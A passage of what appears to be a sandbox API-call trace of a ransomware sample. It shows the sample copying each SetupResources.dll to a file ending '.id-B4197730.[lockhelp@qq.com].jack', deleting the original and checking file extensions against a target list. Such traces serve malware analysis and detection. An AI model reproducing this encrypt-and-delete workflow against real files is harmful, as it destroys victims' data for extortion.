dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.669] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.669] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.670] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.670] GetLastError () returned 0x0 [0196.670] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0196.671] WriteFile (in: hFile=0x3ec, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0196.672] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.673] WriteFile (in: hFile=0x3ec, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.673] SetEndOfFile (hFile=0x3ec) returned 1 [0196.673] CloseHandle (hObject=0x3ec) returned 1 [0196.677] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.677] SetEndOfFile (hFile=0x3f0) returned 1 [0196.678] CloseHandle (hObject=0x3f0) returned 1 [0196.678] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.679] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 1 [0196.679] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.679] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.679] lstrlenW (lpString=".doc") returned 4 [0196.679] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.679] lstrlenW (lpString=".docx") returned 5 [0196.679] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.679] lstrlenW (lpString=".pdf") returned 4 [0196.679] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.680] lstrlenW (lpString=".xls") returned 4 [0196.680] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.680] lstrlenW (lpString=".xlsx") returned 5 [0196.680] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.680] lstrlenW (lpString=".ppt") returned 4 [0196.680] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.680] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.680] lstrlenW (lpString=".zip") returned 4 [0196.680] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.680] lstrlenW (lpString=".rar") returned 4 [0196.680] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.680] lstrlenW (lpString=".bz2") returned 4 [0196.680] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.680] lstrlenW (lpString=".7z") returned 3 [0196.680] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.680] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.680] lstrlenW (lpString=".dbf") returned 4 [0196.680] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.680] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.681] lstrlenW (lpString=".1cd") returned 4 [0196.681] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.681] lstrlenW (lpString=".jpg") returned 4 [0196.681] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.681] lstrlenW (lpString=".doc") returned 4 [0196.681] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.681] lstrlenW (lpString=".docx") returned 5 [0196.681] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.681] lstrlenW (lpString=".pdf") returned 4 [0196.681] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.681] lstrlenW (lpString=".xls") returned 4 [0196.681] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.681] lstrlenW (lpString=".xlsx") returned 5 [0196.681] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.681] lstrlenW (lpString=".ppt") returned 4 [0196.682] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.682] lstrlenW (lpString=".zip") returned 4 [0196.682] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.682] lstrlenW (lpString=".rar") returned 4 [0196.682] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.682] lstrlenW (lpString=".bz2") returned 4 [0196.682] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.682] lstrlenW (lpString=".7z") returned 3 [0196.682] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.682] lstrlenW (lpString=".dbf") returned 4 [0196.682] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.682] lstrlenW (lpString=".1cd") returned 4 [0196.682] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 45 [0196.682] lstrlenW (lpString=".jpg") returned 4 [0196.682] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.683] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.683] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.683] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.684] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0196.684] CloseHandle (hObject=0x3f0) returned 1 [0196.684] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 0x80 [0196.684] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.684] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.684] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.685] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.685] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.685] GetLastError () returned 0x0 [0196.685] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0196.687] WriteFile (in: hFile=0x3ec, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0196.688] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.688] WriteFile (in: hFile=0x3ec, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.688] SetEndOfFile (hFile=0x3ec) returned 1 [0196.689] CloseHandle (hObject=0x3ec) returned 1 [0196.693] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.693] SetEndOfFile (hFile=0x3f0) returned 1 [0196.694] CloseHandle (hObject=0x3f0) returned 1 [0196.694] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.695] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 1 [0196.695] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.695] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.695] lstrlenW (lpString=".doc") returned 4 [0196.695] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.695] lstrlenW (lpString=".docx") returned 5 [0196.695] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.695] lstrlenW (lpString=".pdf") returned 4 [0196.695] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.695] lstrlenW (lpString=".xls") returned 4 [0196.695] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.695] lstrlenW (lpString=".xlsx") returned 5 [0196.695] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.695] lstrlenW (lpString=".ppt") returned 4 [0196.695] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.695] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.696] lstrlenW (lpString=".zip") returned 4 [0196.696] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.696] lstrlenW (lpString=".rar") returned 4 [0196.696] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.696] lstrlenW (lpString=".bz2") returned 4 [0196.696] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.696] lstrlenW (lpString=".7z") returned 3 [0196.696] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.696] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.696] lstrlenW (lpString=".dbf") returned 4 [0196.696] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.696] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.696] lstrlenW (lpString=".1cd") returned 4 [0196.696] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.696] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.696] lstrlenW (lpString=".jpg") returned 4 [0196.696] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.696] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.696] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.696] lstrlenW (lpString=".doc") returned 4 [0196.696] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.696] lstrlenW (lpString=".docx") returned 5 [0196.696] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.696] lstrlenW (lpString=".pdf") returned 4 [0196.696] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.696] lstrlenW (lpString=".xls") returned 4 [0196.696] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.697] lstrlenW (lpString=".xlsx") returned 5 [0196.697] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.697] lstrlenW (lpString=".ppt") returned 4 [0196.697] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.697] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.697] lstrlenW (lpString=".zip") returned 4 [0196.697] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.697] lstrlenW (lpString=".rar") returned 4 [0196.697] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.697] lstrlenW (lpString=".bz2") returned 4 [0196.697] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.697] lstrlenW (lpString=".7z") returned 3 [0196.697] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.697] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.697] lstrlenW (lpString=".dbf") returned 4 [0196.697] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.697] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.697] lstrlenW (lpString=".1cd") returned 4 [0196.697] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.697] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0196.697] lstrlenW (lpString=".jpg") returned 4 [0196.697] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.697] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.697] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.698] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.698] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18776) returned 1 [0196.698] CloseHandle (hObject=0x3f0) returned 1 [0196.698] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 0x80 [0196.698] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.698] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.698] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.698] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.698] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.747] GetLastError () returned 0x0 [0196.747] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4958, lpOverlapped=0x0) returned 1 [0196.749] WriteFile (in: hFile=0x3f8, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4960, lpOverlapped=0x0) returned 1 [0196.751] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.751] WriteFile (in: hFile=0x3f8, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.751] SetEndOfFile (hFile=0x3f8) returned 1 [0196.751] CloseHandle (hObject=0x3f8) returned 1 [0196.754] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.754] SetEndOfFile (hFile=0x3f0) returned 1 [0196.755] CloseHandle (hObject=0x3f0) returned 1 [0196.755] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.756] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 1 [0196.756] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.756] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.756] lstrlenW (lpString=".doc") returned 4 [0196.756] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.756] lstrlenW (lpString=".docx") returned 5 [0196.756] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.756] lstrlenW (lpString=".pdf") returned 4 [0196.756] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.756] lstrlenW (lpString=".xls") returned 4 [0196.756] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.756] lstrlenW (lpString=".xlsx") returned 5 [0196.756] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.756] lstrlenW (lpString=".ppt") returned 4 [0196.757] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.757] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.757] lstrlenW (lpString=".zip") returned 4 [0196.757] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.757] lstrlenW (lpString=".rar") returned 4 [0196.757] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.757] lstrlenW (lpString=".bz2") returned 4 [0196.757] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.757] lstrlenW (lpString=".7z") returned 3 [0196.757] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.757] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.757] lstrlenW (lpString=".dbf") returned 4 [0196.757] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.757] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.757] lstrlenW (lpString=".1cd") returned 4 [0196.757] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.757] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.757] lstrlenW (lpString=".jpg") returned 4 [0196.757] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.757] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.757] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.757] lstrlenW (lpString=".doc") returned 4 [0196.757] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.757] lstrlenW (lpString=".docx") returned 5 [0196.757] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.757] lstrlenW (lpString=".pdf") returned 4 [0196.758] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.758] lstrlenW (lpString=".xls") returned 4 [0196.758] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.758] lstrlenW (lpString=".xlsx") returned 5 [0196.758] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.758] lstrlenW (lpString=".ppt") returned 4 [0196.758] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.758] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.758] lstrlenW (lpString=".zip") returned 4 [0196.758] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.758] lstrlenW (lpString=".rar") returned 4 [0196.758] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.758] lstrlenW (lpString=".bz2") returned 4 [0196.758] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.758] lstrlenW (lpString=".7z") returned 3 [0196.758] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.758] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.758] lstrlenW (lpString=".dbf") returned 4 [0196.758] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.758] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.758] lstrlenW (lpString=".1cd") returned 4 [0196.758] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.758] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0196.758] lstrlenW (lpString=".jpg") returned 4 [0196.758] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.759] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.759] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.759] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.759] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=19288) returned 1 [0196.759] CloseHandle (hObject=0x3f0) returned 1 [0196.759] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 0x80 [0196.759] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.759] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.759] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.759] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.760] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0196.824] GetLastError () returned 0x0 [0196.824] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4b58, lpOverlapped=0x0) returned 1 [0196.826] WriteFile (in: hFile=0x408, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4b60, lpOverlapped=0x0) returned 1 [0196.827] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.827] WriteFile (in: hFile=0x408, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.827] SetEndOfFile (hFile=0x408) returned 1 [0196.827] CloseHandle (hObject=0x408) returned 1 [0196.829] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.829] SetEndOfFile (hFile=0x3f0) returned 1 [0196.830] CloseHandle (hObject=0x3f0) returned 1 [0196.830] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.831] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 1 [0196.831] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0196.831] lstrlenW 